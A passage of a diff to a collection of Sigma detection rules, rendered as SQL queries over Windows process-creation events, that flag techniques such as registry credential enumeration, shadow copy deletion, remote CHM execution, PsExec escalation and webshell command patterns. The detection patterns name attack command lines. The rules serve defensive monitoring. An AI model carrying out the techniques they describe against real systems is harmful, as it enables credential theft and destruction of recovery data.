OR NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" }, { - "title": "Suspicious Electron Application Child Processes", - "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\discord.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_electron_app_children.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - "title": "New Root Certificate Installed Via Certutil.EXE", - "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", - "status": "test", - "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "Local Groups Reconnaissance Via Wmic.EXE", + "id": "164eda96-11b2-430b-85ff-6a265c15bf32", + "status": "experimental", + "description": "Detects the execution of \"wmic\" with the \"group\" flag.\nAdversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on 
occasion. Need to test if GPO push doesn't trigger FP" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '% group%' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_certificate_installation.yml" + "filename": "proc_creation_win_wmic_recon_group.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", + "title": "Visual Studio NodejsTools PressAnyKey Renamed Execution", + "id": "65c3ca2c-525f-4ced-968e-246a713d164f", "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects renamed execution of \"Microsoft.NodejsTools.PressAnyKey.exe\", which can be abused as a LOLBIN to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 
'Microsoft.NodejsTools.PressAnyKey.exe' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_renamed_pressanykey.yml" }, { - "title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "status": "experimental", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE 
'%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR 
CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", - "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", "status": "experimental", - "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", - "author": "TropChaud", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'RUNDLL32.EXE' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - 
"filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "DriverQuery.EXE Execution", - "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", - "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.discovery" - ], + "title": "Password Provided In Command Line Of Net.EXE", + "id": "d4498716-1d52-438f-8084-4a603157d131", + "status": "test", + "description": "Detects a when net.exe is called with a password in the command line", + "author": "Tim Shelton (HAWK.IO)", "falsepositives": [ - "Legitimate use by third party tools in order to investigate installed drivers" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" ], - "filename": "proc_creation_win_driverquery_usage.yml" + "filename": "proc_creation_win_net_use_password_plaintext.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", - "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. 
NATBypass)", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "title": "Use Icacls to Hide File to Everyone", + "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to 
perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "author": "frack113", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'iCACLS.EXE' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_icacls_deny.yml" }, { - "title": "Powershell Inline Execution From A File", - "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", - "status": "experimental", - "description": "Detects inline execution of PowerShell code from a file", - "author": "frack113", + "title": "PUA - Mouse Lock Execution", + "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "status": "test", + "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed 
legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", + "author": "Cian Heasley", + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ], "falsepositives": [ - "Unknown" + "Legitimate uses of Mouse Lock software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_exec_data_file.yml" + "filename": "proc_creation_win_pua_mouselock_execution.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron Systems), MSTI (query)", "tags": [ - "attack.execution" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND 
Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "Potential Execution of Sysinternals Tools", - "id": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", - "status": "experimental", - "description": "Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools", - "author": "Markus Neis", + "title": "Files Added To An Archive Using Rar.EXE", + "id": "6f3e2987-db24-4c78-a860-b4f4095a7095", + "status": "test", + "description": "Detects usage of \"rar\" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Legitimate use of SysInternals tools", - "Programs that use the same command line flag" + "Highly likely if rar is a default archiver in the monitored environment." 
], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -accepteula%' ESCAPE '\\' OR CommandLine LIKE '% /accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_eula_accepted.yml" + "filename": "proc_creation_win_rar_compress_data.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", + "title": "Findstr Launching .lnk File", + "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", "status": "test", - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", + "author": "Trent Liffick", "tags": [ "attack.defense_evasion", - "attack.t1574", - "attack.execution" + "attack.t1036", + "attack.t1202", + "attack.t1027.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_findstr_lnk.yml" }, { - "title": 
"SyncAppvPublishingServer Execute Arbitrary PowerShell Code", - "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", - "author": "frack113", + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112", + "attack.t1562.001" ], "falsepositives": [ - "App-V clients" + "Rare legitimate add to registry via cli (to these locations)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - 
"description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" - ], + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "status": "experimental", + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE 
(EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "DumpMinitool Usage", - "id": "dee0a7a3-f200-4112-a99b-952196d81e42", + "title": "Logged-On User Password Change Via Ksetup.EXE", + "id": "c9783e20-4793-4164-ba96-d9ee483992c4", "status": "experimental", - "description": "Detects the use of \"DumpMinitool.exe\" a tool bundled with Visual Studio and DotNTET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects 